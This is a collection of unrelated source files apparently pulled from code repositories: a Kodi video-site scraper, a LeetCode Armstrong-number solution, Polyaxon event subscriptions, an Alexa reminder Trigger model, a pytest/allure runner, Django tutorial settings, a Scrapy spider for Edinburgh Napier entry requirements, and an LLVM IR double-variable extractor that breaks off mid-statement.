sNextPage = URL_MAIN[:-1] + aResult[1][0][0]
sNumberMax = aResult[1][0][1]
sNumberNext = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2)
sPaging = sNumberNext + '/' + sNumberMax
return sNextPage, sPaging
sPattern = '<span>\d+</span>.+?href=\'([^"]+?)\'.+?>([^<]+)</a></li></ul'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == True):
sNextPage = URL_MAIN[:-1] + aResult[1][0][0]
sNumberMax = aResult[1][0][1]
sNumberNext = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2)
sPaging = sNumberNext + '/' + sNumberMax
return sNextPage, sPaging
return False, 'none'
def showHoster():
oGui = cGui()
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
sThumb = oInputParameterHandler.getValue('sThumb')
sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')
sDesc = oInputParameterHandler.getValue('sDesc')
oParser = cParser()
oRequestHandler = cRequestHandler(sUrl)
sHtmlContent = oRequestHandler.request()
sPattern = 'data-url="([^"]+)".+?data-code="([^"]+)".+?mobile">([^<]+)'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
sDataUrl = aEntry[0]
sDataCode = aEntry[1]
sHost = aEntry[2].capitalize()
            # filter the hosters
oHoster = cHosterGui().checkHoster(sHost)
if not oHoster:
continue
sTitle = ('%s [COLOR coral]%s[/COLOR]') % (sMovieTitle, sHost)
lien = URL_MAIN + 'video/' + sDataCode + '/recaptcha/' + sDataUrl
oOutputParameterHandler.addParameter('sMovieTitle', sMovieTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('siteUrl', lien)
oOutputParameterHandler.addParameter('referer', sUrl)
oGui.addLink(SITE_IDENTIFIER, 'showHostersLinks', sTitle, sThumb, sDesc, oOutputParameterHandler)
sPattern = "class=.download.+?href='/([^']*).+?mobile.>([^<]+)"
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
lien = URL_MAIN + aEntry[0]
sHost = aEntry[1].capitalize()
oHoster = cHosterGui().checkHoster(sHost)
if not oHoster:
continue
sTitle = ('%s [COLOR coral]%s[/COLOR]') % (sMovieTitle, sHost)
oOutputParameterHandler.addParameter('sMovieTitle', sMovieTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('siteUrl', lien)
oOutputParameterHandler.addParameter('referer', sUrl)
oGui.addLink(SITE_IDENTIFIER, 'showHostersLinks', sTitle, sThumb, sDesc, oOutputParameterHandler)
oGui.setEndOfDirectory()
def showHostersLinks():
oGui = cGui()
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')
sThumb = oInputParameterHandler.getValue('sThumb')
referer = oInputParameterHandler.getValue('referer')
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.addHeaderEntry('Referer', referer)
oRequestHandler.request()
sHosterUrl = oRequestHandler.getRealUrl()
oHoster = cHosterGui().checkHoster(sHosterUrl)
if (oHoster != False):
oHoster.setDisplayName(sMovieTitle)
oHoster.setFileName(sMovieTitle)
cHosterGui().showHoster(oGui, oHoster, sHosterUrl, sThumb)
oGui.setEndOfDirectory()
| [
"[email protected]"
] | |
0bf08e9a43aaf6b9a2ef34639ca2ac9cc2f35030 | 6478723d180a8ef39941ba04b80c1eca9f437323 | /Premuim/1134. Armstrong Number.py | 5e3cf31015b6a7071c89cb6029a027521886b866 | [] | no_license | NiuNiu-jupiter/Leetcode | 2a49a365898ecca393cb1eb53a47f4501b25952d | e278ae6ded32f6a2d054ae11ad8fcc45e7bd0f86 | refs/heads/master | 2022-11-22T01:05:57.417538 | 2020-07-28T23:34:39 | 2020-07-28T23:34:39 | 182,104,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | """
The k-digit number N is an Armstrong number if and only if the k-th power of each digit sums to N.
Given a positive integer N, return true if and only if it is an Armstrong number.
Example 1:
Input: 153
Output: true
Explanation:
153 is a 3-digit number, and 153 = 1^3 + 5^3 + 3^3.
Example 2:
Input: 123
Output: false
Explanation:
123 is a 3-digit number, and 123 != 1^3 + 2^3 + 3^3 = 36.
Note:
1 <= N <= 10^8
"""
class Solution:
def isArmstrong(self, N: int) -> bool:
target = N
mi = len(str(target))
res ,digit = 0, 0
while N > 0:
digit = N % 10
res += digit**mi
N //= 10
return res == target
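# A minimal usage sketch added for illustration, checking the two examples
# from the problem statement above (153 -> True, 123 -> False).
if __name__ == "__main__":
    solution = Solution()
    print(solution.isArmstrong(153))  # expected: True
    print(solution.isArmstrong(123))  # expected: False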
| [
"[email protected]"
] | |
0da148c12136dd8d13acd43683cee98ce7199904 | c03d102d36ff21675ec3bb58e5d46af8c3f73ff6 | /polyaxon/tracker/events/job.py | 0e0cac80c31b9515316660fd5e0da98b98625c6c | [
"MIT"
] | permissive | errorsandwarnings/polyaxon | 40cc1ee5797fe8add0a3bfb693abcfcab1c2f9cb | 5eec0bc4aa4ad5f2dce8d1c0ef653265bf4fe6be | refs/heads/master | 2020-03-21T05:28:27.001571 | 2018-06-20T06:43:55 | 2018-06-20T07:40:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | import tracker
from event_manager.events import job
tracker.subscribe(job.JobCreatedEvent)
tracker.subscribe(job.JobUpdatedEvent)
tracker.subscribe(job.JobStartedEvent)
tracker.subscribe(job.JobStartedTriggeredEvent)
tracker.subscribe(job.JobSoppedEvent)
tracker.subscribe(job.JobSoppedTriggeredEvent)
tracker.subscribe(job.JobViewedEvent)
tracker.subscribe(job.JobNewStatusEvent)
tracker.subscribe(job.JobFailedEvent)
tracker.subscribe(job.JobSucceededEvent)
tracker.subscribe(job.JobDoneEvent)
tracker.subscribe(job.JobDeletedEvent)
tracker.subscribe(job.JobDeletedTriggeredEvent)
tracker.subscribe(job.JobLogsViewedEvent)
tracker.subscribe(job.JobRestartedEvent)
tracker.subscribe(job.JobRestartedTriggeredEvent)
tracker.subscribe(job.JobStatusesViewedEvent)
| [
"[email protected]"
] | |
2d532de125892942cfed2532b6dd7d87b171d905 | aff694b019806db8f8cd66fd205f9049351bb10c | /bin/easy_install-2.7 | 8a5bf35b69b51d92171e4827376f2869c6617b0f | [] | no_license | mikilabarda/my-first-blog | 3885d08f87e9c3f05da7000b9e60d29f3895efd3 | 7e1476fa75e6db95bfe8685ad43a233777166071 | refs/heads/master | 2021-05-30T19:25:38.022284 | 2016-03-20T05:31:16 | 2016-03-20T05:31:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | 7 | #!/Users/Miki/Desktop/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
ca40804f3b11f5bf3ee4a29175aac94bdf3ecb7c | 32c4b55b781b0b08860e1e56eb3cf226b1dc7644 | /ask-sdk-model/ask_sdk_model/services/reminder_management/trigger.py | af37e6b7ee01251792653e4516fb55111ff43832 | [
"Apache-2.0"
] | permissive | vertolab/alexa-apis-for-python | 8d2b4b5b44d0360bfa24508ca7d55e4f2c92e0dd | 85274cff0818e78d87f7f389e7b0e4613ddaa170 | refs/heads/master | 2020-04-29T01:33:15.395179 | 2019-03-15T02:33:42 | 2019-03-15T02:33:42 | 175,734,525 | 0 | 0 | Apache-2.0 | 2019-03-15T02:29:44 | 2019-03-15T02:29:44 | null | UTF-8 | Python | false | false | 5,240 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
from ask_sdk_model.services.reminder_management.trigger_type import TriggerType
from ask_sdk_model.services.reminder_management.recurrence import Recurrence
class Trigger(object):
"""
Trigger information for Reminder
:param object_type:
:type object_type: (optional) ask_sdk_model.services.reminder_management.trigger_type.TriggerType
:param scheduled_time: Valid ISO 8601 format - Intended trigger time
:type scheduled_time: (optional) datetime
    :param offset_in_seconds: If the reminder is set using relative time, use this field to specify the time after which the reminder will ring (in seconds)
:type offset_in_seconds: (optional) int
:param time_zone_id: Intended reminder's timezone
:type time_zone_id: (optional) str
:param recurrence:
:type recurrence: (optional) ask_sdk_model.services.reminder_management.recurrence.Recurrence
"""
deserialized_types = {
'object_type': 'ask_sdk_model.services.reminder_management.trigger_type.TriggerType',
'scheduled_time': 'datetime',
'offset_in_seconds': 'int',
'time_zone_id': 'str',
'recurrence': 'ask_sdk_model.services.reminder_management.recurrence.Recurrence'
}
attribute_map = {
'object_type': 'type',
'scheduled_time': 'scheduledTime',
'offset_in_seconds': 'offsetInSeconds',
'time_zone_id': 'timeZoneId',
'recurrence': 'recurrence'
}
def __init__(self, object_type=None, scheduled_time=None, offset_in_seconds=None, time_zone_id=None, recurrence=None):
# type: (Optional[TriggerType], Optional[datetime], Optional[int], Optional[str], Optional[Recurrence]) -> None
"""Trigger information for Reminder
:param object_type:
:type object_type: (optional) ask_sdk_model.services.reminder_management.trigger_type.TriggerType
:param scheduled_time: Valid ISO 8601 format - Intended trigger time
:type scheduled_time: (optional) datetime
        :param offset_in_seconds: If the reminder is set using relative time, use this field to specify the time after which the reminder will ring (in seconds)
:type offset_in_seconds: (optional) int
:param time_zone_id: Intended reminder's timezone
:type time_zone_id: (optional) str
:param recurrence:
:type recurrence: (optional) ask_sdk_model.services.reminder_management.recurrence.Recurrence
"""
self.__discriminator_value = None
self.object_type = object_type
self.scheduled_time = scheduled_time
self.offset_in_seconds = offset_in_seconds
self.time_zone_id = time_zone_id
self.recurrence = recurrence
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, Trigger):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
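# A minimal usage sketch added for illustration: build a relative-time trigger
# and serialize it with to_dict(). The concrete values below are made-up sample
# data, not anything mandated by the SDK.
if __name__ == "__main__":
    sample_trigger = Trigger(offset_in_seconds=300, time_zone_id="America/Los_Angeles")
    print(sample_trigger.to_dict())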
| [
"[email protected]"
] | |
804fcab8ec23cea1ffebc6b018cc84cd0f542370 | c66955c6fc178955c2024e0318ec7a91a8386c2d | /testframework/excise/runnerwithallure.py | 2918eed15525373dfcc856b73f3e07c020e0037c | [] | no_license | duheng18/python-study | a98642d6ee1b0043837c3e7c5b91bf1e28dfa588 | 13c0571ac5d1690bb9e615340482bdb2134ecf0e | refs/heads/master | 2022-11-30T17:36:57.060130 | 2019-11-18T07:31:40 | 2019-11-18T07:31:40 | 147,268,053 | 1 | 0 | null | 2022-11-22T03:36:51 | 2018-09-04T00:49:42 | Python | UTF-8 | Python | false | false | 1,407 | py | #!/usr/bin/env python
# encoding: utf-8
import sys
import os
import pytest
import subprocess
import logging
import allure
import shutil
# Why do we need to add this path to PYTHONPATH?
sys.path.append(os.path.dirname(sys.modules[__name__].__file__))
fileHandler = logging.FileHandler(filename="../log/uiauto.log",encoding="utf-8")
logging.getLogger().setLevel(0)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(module)s:%(lineno)d %(message)s')
fileHandler.setFormatter(formatter)
logging.getLogger().addHandler(fileHandler)
if __name__ == '__main__':
shutil.rmtree('../log/report/xml/')
#pytest.main(['-sq', '--alluredir', '../log/testreport', 'testcases/myselector/test_all_stocks.py'])
#pytest.main(['-sq', '--alluredir', '../log/testreport/xml', 'testcases/login','testcases/myselector'])
#pytest.main(['--alluredir', '../log/report/xml','--allure_severities=blocker', 'testcases/'])
pytest.main(['--alluredir', '../log/report/xml', 'testcases/alluredemo/login/test_login.py::TestLogin::test_2474609'])
#pytest.main(['--alluredir', '../log/report/xml','--allure-severities=blocker', 'testcases/alluredemo/'])
#pytest.main(['--alluredir', '../log/report/xml','--allure-features=测试登录功能', 'testcases/alluredemo/'])
print(subprocess.getstatusoutput('/usr/local/bin/allure generate --clean ../log/report/xml -o ../log/report/html'))
| [
"[email protected]"
] | |
8bdced7c42b83cf816e4f2539ea174d548463aeb | 1f074b0080c75fe7a3056b021551408f96396c59 | /djangoTutorial/settings.py | 1317286cc1e6643f34805a7c3c1a1155948eb079 | [] | no_license | jkiggins/djangoTutorial | 9668c0bb84f60334a43c0c698f6c7ce357342bf7 | d58e7757cbcbdd0b8f42df6859e260dafe2d7d19 | refs/heads/master | 2020-12-01T17:29:25.565130 | 2016-09-10T01:27:21 | 2016-09-10T01:27:21 | 66,515,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | """
Django settings for djangoTutorial project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a!t#35^$4z+^jq3z$wbtwa!5w&*&n4d)rq_m#e4$odu75j0suv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoTutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djangoTutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'EST'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"="
] | = |
4c9532d704fa42823f2a392471ecf7fe6eb6a66e | 1ecde4178548f331f15717f245e3f657b58b9993 | /yyx_crawler/scrapySchool_England_Ben_alevel_ib/scrapySchool_England_Ben/spiders/EdinburghNapierUniversity_Alevel_Ib.py | 852782161acbd27696c6e0f7a26b3c11481e7502 | [] | no_license | gasbarroni8/python_spider | 296dcb7c3fd9dd028423fe5ec0a321d994478b15 | 7935fa462926bc8ea9bf9883bd15265dd0d3e6df | refs/heads/master | 2023-03-26T05:22:59.858422 | 2019-04-15T07:17:56 | 2019-04-15T07:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,486 | py | # -*- coding: utf-8 -*-
import scrapy
import re
from scrapySchool_England_Ben.clearSpace import clear_space, clear_lianxu_space
from scrapySchool_England_Ben.getItem import get_item
from scrapySchool_England_Ben.getTuition_fee import getTuition_fee
from scrapySchool_England_Ben.items import ScrapyschoolEnglandBenItem
from scrapySchool_England_Ben.getIELTS import get_ielts, get_toefl
from scrapySchool_England_Ben.getStartDate import getStartDate
from scrapySchool_England_Ben.remove_tags import remove_class
from scrapySchool_England_Ben.getDuration import getIntDuration, getTeachTime
from w3lib.html import remove_tags
class EdinburghNapierUniversity_Alevel_IbSpider(scrapy.Spider):
name = "EdinburghNapierUniversity_Alevel_Ib"
start_urls = ["https://www.bolton.ac.uk/subject-areas/all-subjects/"]
def parse(self, response):
links = ["https://www.napier.ac.uk/courses/bsc-hons-physical-activity-and-health-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sport-and-exercise-science-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-graphic-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-photography-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-product-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-communication-advertising--public-relations-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-languages-and-intercultural-communication-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-microbiology-and-biotechnology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-animal-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-acting-and-english-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sports-coaching-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-civil-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-computing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-creative-computing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-social-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/beng-hons-cybersecurity-and-forensics-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-civil-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-with-tourism-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-entrepreneurship-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-marine-and-freshwater-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-animal-and-conservation-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-business-management-and-languages-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-and-festival--event-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-marketing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-human-resource-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-biological-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-biomedical-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-applied-microbiology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-business-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality--service-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-studies-sandwich-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-with-corporate-finance-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-with-law-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-civil--transportation-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-psychology-with-sociology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-financial-services-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-adult-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-engineering-with-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons--bsc-hons-psychology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-mechatronics-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-construction-and-project-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-learning-disabilities-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-international-hospitality-management-city-of-glasgow-college-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/llb--llb-hons-law-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-criminology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-interior--spatial-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-information-technology-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-mechanical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-policing-and-criminology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-business-information-technology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-english-and-film-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-music-popular-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/beng-hons-computer-systems-and-networks-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-english-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bmus-hons-music-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-business-management-west-lothian-college-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-computing-science-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bm-midwifery-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/baba-hons-accounting-and-finance-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-television-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-journalism-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-software-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-and-airline-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-web-design-and-development-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-software-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-games-development-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-electronic--electrical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-mental-health-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-electronic--electrical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-digital-media-and-interaction-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-energy-and-environmental-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-film-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-architectural-technology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-child-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-real-estate-surveying-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sound-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-acting-for-stage-and-screen-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-marketing-with-digital-media-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-digital-media-and-interaction-design-global-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-marketing-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-veterinary-nursing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-mechanical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-nursing-studies--option-rich-programme-undergraduate-fulltime", ]
print(len(links))
links = list(set(links))
print(len(links))
for url in links:
yield scrapy.Request(url, callback=self.parse_data, meta={'url': url})
def parse_data(self, response):
item = get_item(ScrapyschoolEnglandBenItem)
item['university'] = "Edinburgh Napier University"
item['url'] = response.meta['url']
print("===========================")
print(response.url)
print(response.meta['url'])
try:
alevel = response.xpath(
"//div[@id='tab1']//h3[contains(text(),'A Level')]/following-sibling::*").extract()
print(alevel)
if len(alevel) > 0:
for i in range(len(alevel)):
if "<h3>" in alevel[i]:
item['alevel'] = remove_tags(clear_lianxu_space(alevel[:i]))
break
if item['alevel'] == "":
item['alevel'] = remove_tags(clear_lianxu_space(alevel))
# item['alevel'] = clear_lianxu_space(alevel)
print("item['alevel']: ", item['alevel'])
ib = response.xpath(
"//div[@id='tab1']//h3[contains(text(),'International Baccalaureate')]/following-sibling::*").extract()
print("ib: ", ib)
if len(ib) > 0:
for i in range(len(ib)):
if "<h3>" in ib[i]:
item['ib'] = remove_tags(clear_lianxu_space(ib[:i]))
break
if item['ib'] == "":
item['ib'] = remove_tags(clear_lianxu_space(ib))
# item['ib'] = clear_lianxu_space(ib)
print("item['ib']: ", item['ib'])
yield item
except Exception as e:
with open("scrapySchool_England_Ben/error/" + item['university'] + str(item['degree_type']) + ".txt", 'a', encoding="utf-8") as f:
f.write(str(e) + "\n" + response.url + "\n========================\n")
print("异常:", str(e))
print("报错url:", response.url)
| [
"[email protected]"
] | |
73b7beaa9bea2b28e0fd1617ec699f27fe407e5a | 107f9bbd587decbab2e6188c0085e9f67b5f3708 | /Extractor/util/DoubleValExtractor.py | 6bba748c3edadf2ace17f5fc93206e110ab92d6e | [
"Apache-2.0"
] | permissive | FloatErrorAnalysis/LLVM | 4dbcd52a60774847949cf190a71cdf374ca437ce | 7ce723e1fe7fee227ab7c0ac8d49bca89459957a | refs/heads/master | 2020-04-03T14:56:55.038691 | 2018-11-11T15:09:56 | 2018-11-11T15:09:56 | 155,343,259 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,116 | py | # 一个专门用于提取ll文件double类型变量和相关函数以及double类型的函数的工具类
''' 全局标识符(函数,全局变量)以“@”字符开头。
本地标识符(注册名称,类型)以'%'字符开头 '''
class DoubleValExtractor:
source_file_path = ''
ll_file_content_list = []
vm_module = []
double_vars = []
double_functions = []
double_statements = []
def __init__(self, source_file_path):
self.source_file_path = source_file_path
with open(self.source_file_path, 'r') as ll_file:
ll_file_content = ll_file.read()
tmp_list = ll_file_content.split('\n')
for line in tmp_list:
self.ll_file_content_list.append(line.strip())
if 'double' in line:
self.double_statements.append(line)
def extract_double_functions(self):
        # Defined double functions start with the "define double" marker and end with '}'
flag = False
for line in self.ll_file_content_list:
if 'define double' in line:
flag = True
if flag:
self.double_functions.append(line)
if '}' in line:
flag = False
            # Declarations
if 'declare double' in line:
self.double_functions.append(line)
return self.double_functions
# TODO
def extract_double_vars(self):
for statement in self.double_statements:
            # List all double-typed temporary registers
if statement.find('%') != -1:
idx = statement.find('%')
if statement[idx + 1: idx + 2].isalnum():
self.double_vars.append('%' + statement[idx + 1: idx + 2])
return list(set(self.double_vars))
def extract_double_concerned_statements(self):
return list(set(self.double_statements + self.extract_double_functions()))
extractor = DoubleValExtractor('/Users/py/GitHub/LLVM/functions/ll_file/sqrt_minus.ll')
with open('double_ll', 'w') as f:
